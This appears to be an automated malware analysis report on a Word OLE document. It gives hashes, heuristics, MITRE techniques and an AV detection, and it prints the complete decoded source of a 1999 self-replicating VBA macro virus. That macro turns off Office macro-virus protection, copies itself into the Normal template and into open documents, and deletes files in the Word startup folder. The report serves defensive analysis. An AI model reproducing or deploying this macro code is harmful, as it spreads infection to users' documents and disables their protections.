Office (OLE) malware analysis — malicious · 4b34811714101d1b

MALICIOUS

Office (OLE)

42.5 KB First seen: 2015-10-13

MD5: ed3ab861cc06f43311a2344322079d80 SHA-1: 7c63744c8419a28fbd3f76d0e7a01d590952fb24 SHA-256: 4b34811714101d1beb11aa8af51dc19f3835f8907f99bb209e1b6d7e86456a01

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1546.001 Event Triggered Execution: Run at Startup

The sample is a malicious OLE document containing VBA macros. The macros are designed to disable Office macro security features and replicate themselves to other documents, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic and the script's attempt to disable virus protection and modify the VBA project. The ClamAV detection 'Doc.Trojan.Touchme-1' further supports its malicious nature. The script's intent is to spread itself and impair defenses.

Heuristics 4

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 43,520 bytes but its declared streams total only 16,490 bytes — 27,030 bytes (62%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3873 bytes
SHA-256: `86aa1a9b309b49872c064d36d7e0834c96aa98777e34c05e4163b88264a0d1f9`
Detection ClamAV: Doc.Trojan.Touchme-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' This code written by Reza Pc 212 ' Copyright (C) 1999 ReYoKh Team Labs ' University of Gunadarma ' ' for all virii maker 'n the stupid jerk ' ' Last Up-Date 3 November 1999 [19.00:00] Private Sub Infected() On Error Resume Next ID = "'tHe FuCkIng aV if TOuCh mE" Dim ADSave, NTSave, ADInfect, NTInfect As Boolean Dim Listing, Active, Ultah, Name As String Dim AD, NT As Object Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule If AD.Lines(99, 1) = ID Then ADInfect = True If NT.Lines(99, 1) = ID Then NTInfect = True ActiveDocument.Protect -1 ActiveDocument.Password = "" Options.VirusProtection = False Options.SavePropertiesPrompt = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False WordBasic.DisableAutoMacros True Application.Caption = "Mikrosof Werd" For Each Obj In ActiveDocument.VBProject.VBComponents If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then Application.OrganizerDelete Source:=ActiveDocument.FullName, _ Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems End If Next Obj For Each Obj In NormalTemplate.VBProject.VBComponents If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then Application.OrganizerDelete Source:=NormalTemplate.FullName, _ Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems End If Next Obj If NTInfect = False Then NTSave = NormalTemplate.Saved Listing = AD.Lines(1, AD.CountOfLines) NT.DeleteLines 1, NT.CountOfLines NT.AddFromString Listing If NTSave = True Then NormalTemplate.Save Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate, Name:="EcHa", Object:=wdOrganizerObjectProjectItems End If ADSave = ActiveDocument.Saved Listing = NT.Lines(1, NT.CountOfLines) AD.DeleteLines 1, AD.CountOfLines AD.AddFromString Listing If ADSave = True Then ActiveDocument.Save Application.OrganizerCopy Source:=NormalTemplate.FullName, _ Destination:=ActiveDocument, Name:="EcHa", Object:=wdOrganizerObjectProjectItems If Day(Date) = 1 Then Name = ID If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA" If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI" If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS" If Name <> "" And Name <> ID Then Ultah = "Oh ya... Selamat Ulang Tahun !!!" + Chr(13) + Name + _ ", I hope you always Happy" Active = Assistant.Visible Assistant.Visible = True With Assistant.NewBalloon .Text = "EcHa mengucapkan terima kasih... " + Chr(13) + _ "Telah menggunakan macro saya" + Chr(13) + Chr(13) + Ultah .Show End With Assistant.Visible = Active End If Kill Application.StartupPath + "\." Options.VirusProtection = True WordBasic.DisableAutoMacros False End Sub Private Sub Document_Close() Infected End Sub Private Sub Document_Open() Infected End Sub Private Sub Document_Save() Infected End Sub Private Sub Document_New() Infected End Sub Private Sub Document_Exit() Infected End Sub Private Sub Document_Exec() Infected End Sub 'tHe FuCkIng aV if TOuCh mE

Open this report in the interactive analyzer, or submit your own file for analysis.